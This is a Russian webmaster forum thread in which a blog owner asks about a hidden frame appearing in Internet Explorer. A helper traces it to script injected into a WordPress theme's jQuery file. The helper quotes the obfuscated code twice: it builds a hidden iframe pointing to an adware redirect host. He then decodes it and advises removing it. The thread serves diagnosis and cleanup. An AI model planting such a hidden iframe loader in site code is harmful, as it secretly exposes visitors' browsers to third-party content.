Форум Сайтостроение Веб-строительство

На сайте подгружается сторонний фрейм, причем видно только в IE

Evgeniy T.
На сайте с 29.04.2007
Offline
101
Evgeniy T.
831

Сегодня заметил, что на моем блоге слева вверху подгружается фрейм гугла и видно это только в Интернет Эксплорере. Найти сторонний код пока не смог.

Кто-нибудь сталкивался с подобным? Где и как его (сторонний код) лучше искать?

Вот ссылка: http://designfire.ru

Вот скрин:

jpg 11.jpg
kil
На сайте с 03.04.2006
Offline
84
kil
#1

1. Лезем в html код

2. Ищем подозрительный js в исходном коде: 

<script type="text/javascript" src="/wp-content/themes/designfire/js/jquery-latest.pack.js"></script>

3. Смотрим код js и видим что создается позозрительный iframe:

 var tckqkgne=document.createElement('iframe');try{tckqkgne.setAttribute('style','display: none'); tckqkgne.setAttribute('src','hsNstqt@@p!b:bsz/9/Yssaq9dz@wz@ba49rNe4zcobu!!nb@tbNeYbr4.q!c!bo@m@4q/NYiNzn!sq.9c9gY!@izz?!q1qN0!s!'.replace(/[zq!4bsY9@N]/g,'')); document.body.appendChild(tckqkgne);}

4. Проверяем, что за хрень там написана. Так как лень разбираться, копируем кусок скрипта, добавляющий для ифрейма src и смотрим, что получается на тестовой странице:

<html>
<body>
<script>
ss='hsNstqt@@p!b:bsz/9/Yssaq9dz@wz@ba49rNe4zcobu!!nb@tbNeYbr4.q!c!bo@m@4q/NYiNzn!sq.9c9gY!@izz?!q1qN0!s!'.replace(/[zq!4bsY9@N]/g,'');
document.write(ss);
</script>
</body>
</html>

5. На тестовой странице видим адрес: http://adwarecounter.com/in.cgi?10

6. Переходим по адресу и оказываемся редиректом на http://www.google.ru/

7. Трём бяку из javascript и даем обещание впредь не пользоваться готовым говнокодом :)

Evgeniy T.
На сайте с 29.04.2007
Offline
101
Evgeniy T.
#2
kil:
1. Лезем в html код
2. Ищем подозрительный js в исходном коде: 
<script type="text/javascript" src="/wp-content/themes/designfire/js/jquery-latest.pack.js"></script>

3. Смотрим код js и видим что создается позозрительный iframe:
 var tckqkgne=document.createElement('iframe');try{tckqkgne.setAttribute('style','display: none'); tckqkgne.setAttribute('src','hsNstqt@@p!b:bsz/9/Yssaq9dz@wz@ba49rNe4zcobu!!nb@tbNeYbr4.q!c!bo@m@4q/NYiNzn!sq.9c9gY!@izz?!q1qN0!s!'.replace(/[zq!4bsY9@N]/g,'')); document.body.appendChild(tckqkgne);}

4. Проверяем, что за хрень там написана. Так как лень разбираться, копируем кусок скрипта, добавляющий для ифрейма src и смотрим, что получается на тестовой странице: 
<html>

<body>

<script>

ss='hsNstqt@@p!b:bsz/9/Yssaq9dz@wz@ba49rNe4zcobu!!nb@tbNeYbr4.q!c!bo@m@4q/NYiNzn!sq.9c9gY!@izz?!q1qN0!s!'.replace(/[zq!4bsY9@N]/g,'');

document.write(ss);

</script>

</body>

</html>

5. На тестовой странице видим адрес: http://adwarecounter.com/in.cgi?10
6. Переходим по адресу и оказываемся редиректом на http://www.google.ru/
7. Трём бяку из javascript и даем обещание впредь не пользоваться готовым говнокодом :)

kil, спасибо огромное за развернутый ответ. Помогли 🚬

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий